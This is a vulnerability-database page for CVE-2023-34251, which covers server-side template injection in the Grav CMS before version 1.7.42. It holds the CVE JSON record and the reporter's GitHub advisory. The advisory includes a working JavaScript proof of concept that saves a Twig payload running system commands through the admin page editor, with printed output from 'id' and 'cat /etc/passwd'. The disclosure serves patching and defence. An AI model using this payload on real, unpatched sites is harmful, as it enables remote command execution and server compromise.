cvelistv5 - cve-2023-34251

CVE-2023-34251 (GCVE-0-2023-34251)

Vulnerability from cvelistv5

Published

2023-06-14 21:31

Modified

2024-12-27 16:52

Severity ?

9.9 (Critical) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-94 - Improper Control of Generation of Code ('Code Injection')

Summary

Grav is a flat-file content management system. Versions prior to 1.7.42 are vulnerable to server side template injection. Remote code execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges. Version 1.7.42 contains a fix for this issue.

References

►

URL

Tags

security-advisories@github.com	https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174	Vendor Advisory
security-advisories@github.com	https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5	Patch
security-advisories@github.com	https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	getgrav	grav	Version: < 1.7.42

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T16:01:54.348Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5"
          },
          {
            "name": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5"
          },
          {
            "name": "https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-34251",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-12-27T16:52:48.122441Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-12-27T16:52:56.757Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "grav",
          "vendor": "getgrav",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.7.42"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Grav is a flat-file content management system. Versions prior to 1.7.42 are vulnerable to server side template injection. Remote code execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges. Version 1.7.42 contains a fix for this issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 10,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-94",
              "description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-06-14T22:17:20.071Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5"
        },
        {
          "name": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5"
        },
        {
          "name": "https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174"
        }
      ],
      "source": {
        "advisory": "GHSA-f9jf-4cp4-4fq5",
        "discovery": "UNKNOWN"
      },
      "title": "Grav Server Side Template Injection vulnerability"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2023-34251",
    "datePublished": "2023-06-14T21:31:31.908Z",
    "dateReserved": "2023-05-31T13:51:51.174Z",
    "dateUpdated": "2024-12-27T16:52:56.757Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2023-34251\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2023-06-14T22:15:09.333\",\"lastModified\":\"2024-11-21T08:06:51.773\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Grav is a flat-file content management system. Versions prior to 1.7.42 are vulnerable to server side template injection. Remote code execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges. Version 1.7.42 contains a fix for this issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\",\"baseScore\":9.9,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.1,\"impactScore\":6.0},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.2,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.2,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-94\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.7.42\",\"matchCriteriaId\":\"758F84B9-A2EC-45D8-86DD-B309DB02B9AE\"}]}]}],\"references\":[{\"url\":\"https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5\", \"name\": \"https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}, {\"url\": \"https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5\", \"name\": \"https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174\", \"name\": \"https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T16:01:54.348Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2023-34251\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-12-27T16:52:48.122441Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-12-27T16:52:53.051Z\"}}], \"cna\": {\"title\": \"Grav Server Side Template Injection vulnerability\", \"source\": {\"advisory\": \"GHSA-f9jf-4cp4-4fq5\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 10, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"getgrav\", \"product\": \"grav\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.7.42\"}]}], \"references\": [{\"url\": \"https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5\", \"name\": \"https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5\", \"name\": \"https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174\", \"name\": \"https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Grav is a flat-file content management system. Versions prior to 1.7.42 are vulnerable to server side template injection. Remote code execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges. Version 1.7.42 contains a fix for this issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-94\", \"description\": \"CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2023-06-14T22:17:20.071Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2023-34251\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-12-27T16:52:56.757Z\", \"dateReserved\": \"2023-05-31T13:51:51.174Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2023-06-14T21:31:31.908Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

ghsa-f9jf-4cp4-4fq5

Vulnerability from github

Published

2023-06-16 19:35

Modified

2023-06-16 19:35

Severity ?

9.1 (Critical) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Summary

Grav Server Side Template Injection (SSTI) vulnerability

Details

Summary

I found an RCE(Remote Code Execution) by SSTI in the admin screen.

Details

Remote Code Execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges.

PoC

Log in to the administrator screen and access the edit screen of the default page "Typography". (http://127.0.0.1:8000/admin/pages/typography)
Open the browser's console screen and execute the following JavaScript code to confirm that an arbitrary command (id) is being executed. ```js (async () => { const nonce = document.querySelector("input[name=admin-nonce]").value; const id = document.querySelector("input[name=unique_form_id]").value;

const payload = "{{['id']|map('system')|join}}"; // SSTI Payload

const params = new URLSearchParams(); params.append("task", "save"); params.append("data[header][title]", "poc"); params.append("data[content]", payload); params.append("data[folder]", "poc"); params.append("data[route]", ""); params.append("data[name]", "default"); params.append("data[header][body_classes]", ""); params.append("data[ordering]", 1); params.append("data[order]", ""); params.append("toggleable_data[header][process]", "on"); params.append("data[header][process][twig]", 1); params.append("data[header][order_by]", ""); params.append("data[header][order_manual]", ""); params.append("data[blueprint", ""); params.append("data[lang]", ""); params.append("_post_entries_save", "edit"); params.append("form-name", "flex-pages"); params.append("unique_form_id", id); params.append("admin-nonce", nonce);

await fetch("http://127.0.0.1:8000/admin/pages/typography", { method: "POST", headers: { "content-type": "application/x-www-form-urlencoded", }, body: params, });

window.open("http://127.0.0.1:8000/admin/pages/poc/:preview"); })(); ```

Execution Result

Payload: {{['id']|map('system')|join}} sh uid=501(<user_name>) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae) uid=501(<user_name>) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)
Payload: {{['cat /etc/passwd']|map('system')|join}} ```sh

# User Database # # Note that this file is consulted directly only when the system is running # in single-user mode. At other times this information is provided by # Open Directory. # # See the opendirectoryd(8) man page for additional information about # Open Directory. ## nobody::-2:-2:Unprivileged User:/var/empty:/usr/bin/false root::0:0:System Administrator:/var/root:/bin/sh daemon::1:1:System Services:/var/root:/usr/bin/false _uucp::4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico _taskgated::13:13:Task Gate Daemon:/var/empty:/usr/bin/false _networkd::24:24:Network Services:/var/networkd:/usr/bin/false _installassistant::25:25:Install Assistant:/var/empty:/usr/bin/false _lp::26:26:Printing Services:/var/spool/cups:/usr/bin/false _postfix::27:27:Postfix Mail Server:/var/spool/postfix:/usr/bin/false _scsd::31:31:Service Configuration Service:/var/empty:/usr/bin/false _ces::32:32:Certificate Enrollment Service:/var/empty:/usr/bin/false _appstore::33:33:Mac App Store Service:/var/db/appstore:/usr/bin/false _mcxalr::54:54:MCX AppLaunch:/var/empty:/usr/bin/false _appleevents::55:55:AppleEvents Daemon:/var/empty:/usr/bin/false _geod::56:56:Geo Services Daemon:/var/db/geod:/usr/bin/false _devdocs::59:59:Developer Documentation:/var/empty:/usr/bin/false _sandbox::60:60:Seatbelt:/var/empty:/usr/bin/false _mdnsresponder::65:65:mDNSResponder:/var/empty:/usr/bin/false _ard::67:67:Apple Remote Desktop:/var/empty:/usr/bin/false _www::70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false _eppc::71:71:Apple Events User:/var/empty:/usr/bin/false _cvs::72:72:CVS Server:/var/empty:/usr/bin/false _svn::73:73:SVN Server:/var/empty:/usr/bin/false _mysql::74:74:MySQL Server:/var/empty:/usr/bin/false _sshd::75:75:sshd Privilege separation:/var/empty:/usr/bin/false _qtss::76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false _cyrus::77:6:Cyrus Administrator:/var/imap:/usr/bin/false _mailman::78:78:Mailman List Server:/var/empty:/usr/bin/false _appserver::79:79:Application Server:/var/empty:/usr/bin/false _clamav::82:82:ClamAV Daemon:/var/virusmails:/usr/bin/false _amavisd::83:83:AMaViS Daemon:/var/virusmails:/usr/bin/false _jabber::84:84:Jabber XMPP Server:/var/empty:/usr/bin/false _appowner::87:87:Application Owner:/var/empty:/usr/bin/false _windowserver::88:88:WindowServer:/var/empty:/usr/bin/false _spotlight::89:89:Spotlight:/var/empty:/usr/bin/false _tokend::91:91:Token Daemon:/var/empty:/usr/bin/false _securityagent::92:92:SecurityAgent:/var/db/securityagent:/usr/bin/false _calendar::93:93:Calendar:/var/empty:/usr/bin/false _teamsserver::94:94:TeamsServer:/var/teamsserver:/usr/bin/false _update_sharing::95:-2:Update Sharing:/var/empty:/usr/bin/false _installer::96:-2:Installer:/var/empty:/usr/bin/false _atsserver::97:97:ATS Server:/var/empty:/usr/bin/false _ftp::98:-2:FTP Daemon:/var/empty:/usr/bin/false _unknown::99:99:Unknown User:/var/empty:/usr/bin/false _softwareupdate::200:200:Software Update Service:/var/db/softwareupdate:/usr/bin/false _coreaudiod::202:202:Core Audio Daemon:/var/empty:/usr/bin/false _screensaver::203:203:Screensaver:/var/empty:/usr/bin/false _locationd::205:205:Location Daemon:/var/db/locationd:/usr/bin/false _trustevaluationagent::208:208:Trust Evaluation Agent:/var/empty:/usr/bin/false _timezone::210:210:AutoTimeZoneDaemon:/var/empty:/usr/bin/false _lda::211:211:Local Delivery Agent:/var/empty:/usr/bin/false _cvmsroot::212:212:CVMS Root:/var/empty:/usr/bin/false _usbmuxd::213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false _dovecot::214:6:Dovecot Administrator:/var/empty:/usr/bin/false _dpaudio::215:215:DP Audio:/var/empty:/usr/bin/false _postgres::216:216:PostgreSQL Server:/var/empty:/usr/bin/false _krbtgt::217:-2:Kerberos Ticket Granting Ticket:/var/empty:/usr/bin/false _kadmin_admin::218:-2:Kerberos Admin Service:/var/empty:/usr/bin/false _kadmin_changepw::219:-2:Kerberos Change Password Service:/var/empty:/usr/bin/false _devicemgr::220:220:Device Management Server:/var/empty:/usr/bin/false _webauthserver::221:221:Web Auth Server:/var/empty:/usr/bin/false _netbios::222:222:NetBIOS:/var/empty:/usr/bin/false _warmd::224:224:Warm Daemon:/var/empty:/usr/bin/false _dovenull::227:227:Dovecot Authentication:/var/empty:/usr/bin/false _netstatistics::228:228:Network Statistics Daemon:/var/empty:/usr/bin/false _avbdeviced::229:-2:Ethernet AVB Device Daemon:/var/empty:/usr/bin/false _krb_krbtgt::230:-2:Open Directory Kerberos Ticket Granting Ticket:/var/empty:/usr/bin/false _krb_kadmin::231:-2:Open Directory Kerberos Admin Service:/var/empty:/usr/bin/false _krb_changepw::232:-2:Open Directory Kerberos Change Password Service:/var/empty:/usr/bin/false _krb_kerberos::233:-2:Open Directory Kerberos:/var/empty:/usr/bin/false _krb_anonymous::234:-2:Open Directory Kerberos Anonymous:/var/empty:/usr/bin/false _assetcache::235:235:Asset Cache Service:/var/empty:/usr/bin/false _coremediaiod::236:236:Core Media IO Daemon:/var/empty:/usr/bin/false _launchservicesd::239:239:_launchservicesd:/var/empty:/usr/bin/false _iconservices::240:240:IconServices:/var/empty:/usr/bin/false _distnote::241:241:DistNote:/var/empty:/usr/bin/false _nsurlsessiond::242:242:NSURLSession Daemon:/var/db/nsurlsessiond:/usr/bin/false _displaypolicyd::244:244:Display Policy Daemon:/var/empty:/usr/bin/false _astris::245:245:Astris Services:/var/db/astris:/usr/bin/false _krbfast::246:-2:Kerberos FAST Account:/var/empty:/usr/bin/false _gamecontrollerd::247:247:Game Controller Daemon:/var/empty:/usr/bin/false _mbsetupuser::248:248:Setup User:/var/setup:/bin/bash _ondemand::249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false _xserverdocs::251:251:macOS Server Documents Service:/var/empty:/usr/bin/false _wwwproxy::252:252:WWW Proxy:/var/empty:/usr/bin/false _mobileasset::253:253:MobileAsset User:/var/ma:/usr/bin/false _findmydevice::254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false _datadetectors::257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false _captiveagent::258:258:captiveagent:/var/empty:/usr/bin/false _ctkd::259:259:ctkd Account:/var/empty:/usr/bin/false _applepay::260:260:applepay Account:/var/db/applepay:/usr/bin/false _hidd::261:261:HID Service User:/var/db/hidd:/usr/bin/false _cmiodalassistants::262:262:CoreMedia IO Assistants User:/var/db/cmiodalassistants:/usr/bin/false _analyticsd::263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false _fpsd::265:265:FPS Daemon:/var/db/fpsd:/usr/bin/false _timed::266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false _nearbyd::268:268:Proximity and Ranging Daemon:/var/db/nearbyd:/usr/bin/false _reportmemoryexception::269:269:ReportMemoryException:/var/db/reportmemoryexception:/usr/bin/false _driverkit::270:270:DriverKit:/var/empty:/usr/bin/false _diskimagesiod::271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false _logd::272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false _appinstalld::273:273:App Install Daemon:/var/db/appinstalld:/usr/bin/false _installcoordinationd::274:274:Install Coordination Daemon:/var/db/installcoordinationd:/usr/bin/false _demod::275:275:Demo Daemon:/var/empty:/usr/bin/false _rmd::277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false _accessoryupdater::278:278:Accessory Update Daemon:/var/db/accessoryupdater:/usr/bin/false _knowledgegraphd::279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false _coreml::280:280:CoreML Services:/var/db/coreml:/usr/bin/false _sntpd::281:281:SNTP Server Daemon:/var/empty:/usr/bin/false _trustd::282:282:trustd:/var/empty:/usr/bin/false _mmaintenanced::283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false _darwindaemon::284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false _notification_proxy::285:285:Notification Proxy:/var/empty:/usr/bin/false _avphidbridge::288:288:Apple Virtual Platform HID Bridge:/var/empty:/usr/bin/false _biome::289:289:Biome:/var/db/biome:/usr/bin/false _backgroundassets::291:291:Background Assets Service:/var/empty:/usr/bin/false _oahd::441:441:OAH Daemon:/var/empty:/usr/bin/false _oahd::441:441:OAH Daemon:/var/empty:/usr/bin/false

```

PoC Video

PoC Video

Impact

Remote Command Execution (RCE) is possible.

Occurrences

https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174

References

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "getgrav/grav"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.7.42"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-34251"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-06-16T19:35:56Z",
    "nvd_published_at": "2023-06-14T22:15:09Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nI found an RCE(Remote Code Execution) by SSTI in the admin screen.\n\n### Details\nRemote Code Execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges.\n\n### PoC\n1. Log in to the administrator screen and access the edit screen of the default page \"Typography\". (`http://127.0.0.1:8000/admin/pages/typography`)\n2. Open the browser\u0027s console screen and execute the following JavaScript code to confirm that an arbitrary command (`id`) is being executed.\n```js\n(async () =\u003e {\n  const nonce = document.querySelector(\"input[name=admin-nonce]\").value;\n  const id = document.querySelector(\"input[name=__unique_form_id__]\").value;\n\n  const payload = \"{{[\u0027id\u0027]|map(\u0027system\u0027)|join}}\"; // SSTI Payload\n\n  const params = new URLSearchParams();\n  params.append(\"task\", \"save\");\n  params.append(\"data[header][title]\", \"poc\");\n  params.append(\"data[content]\", payload);\n  params.append(\"data[folder]\", \"poc\");\n  params.append(\"data[route]\", \"\");\n  params.append(\"data[name]\", \"default\");\n  params.append(\"data[header][body_classes]\", \"\");\n  params.append(\"data[ordering]\", 1);\n  params.append(\"data[order]\", \"\");\n  params.append(\"toggleable_data[header][process]\", \"on\");\n  params.append(\"data[header][process][twig]\", 1);\n  params.append(\"data[header][order_by]\", \"\");\n  params.append(\"data[header][order_manual]\", \"\");\n  params.append(\"data[blueprint\", \"\");\n  params.append(\"data[lang]\", \"\");\n  params.append(\"_post_entries_save\", \"edit\");\n  params.append(\"__form-name__\", \"flex-pages\");\n  params.append(\"__unique_form_id__\", id);\n  params.append(\"admin-nonce\", nonce);\n\n  await fetch(\"http://127.0.0.1:8000/admin/pages/typography\", {\n    method: \"POST\",\n    headers: {\n      \"content-type\": \"application/x-www-form-urlencoded\",\n    },\n    body: params,\n  });\n\n  window.open(\"http://127.0.0.1:8000/admin/pages/poc/:preview\");\n})();\n```\n\n#### Execution Result\n- Payload: `{{[\u0027id\u0027]|map(\u0027system\u0027)|join}}`\n```sh\nuid=501(\u003cuser_name\u003e) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae) uid=501(\u003cuser_name\u003e) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)\n```\n- Payload: `{{[\u0027cat /etc/passwd\u0027]|map(\u0027system\u0027)|join}}`\n```sh\n## # User Database # # Note that this file is consulted directly only when the system is running # in single-user mode. At other times this information is provided by # Open Directory. # # See the opendirectoryd(8) man page for additional information about # Open Directory. ## nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico _taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false _networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false _installassistant:*:25:25:Install Assistant:/var/empty:/usr/bin/false _lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/false _postfix:*:27:27:Postfix Mail Server:/var/spool/postfix:/usr/bin/false _scsd:*:31:31:Service Configuration Service:/var/empty:/usr/bin/false _ces:*:32:32:Certificate Enrollment Service:/var/empty:/usr/bin/false _appstore:*:33:33:Mac App Store Service:/var/db/appstore:/usr/bin/false _mcxalr:*:54:54:MCX AppLaunch:/var/empty:/usr/bin/false _appleevents:*:55:55:AppleEvents Daemon:/var/empty:/usr/bin/false _geod:*:56:56:Geo Services Daemon:/var/db/geod:/usr/bin/false _devdocs:*:59:59:Developer Documentation:/var/empty:/usr/bin/false _sandbox:*:60:60:Seatbelt:/var/empty:/usr/bin/false _mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false _ard:*:67:67:Apple Remote Desktop:/var/empty:/usr/bin/false _www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false _eppc:*:71:71:Apple Events 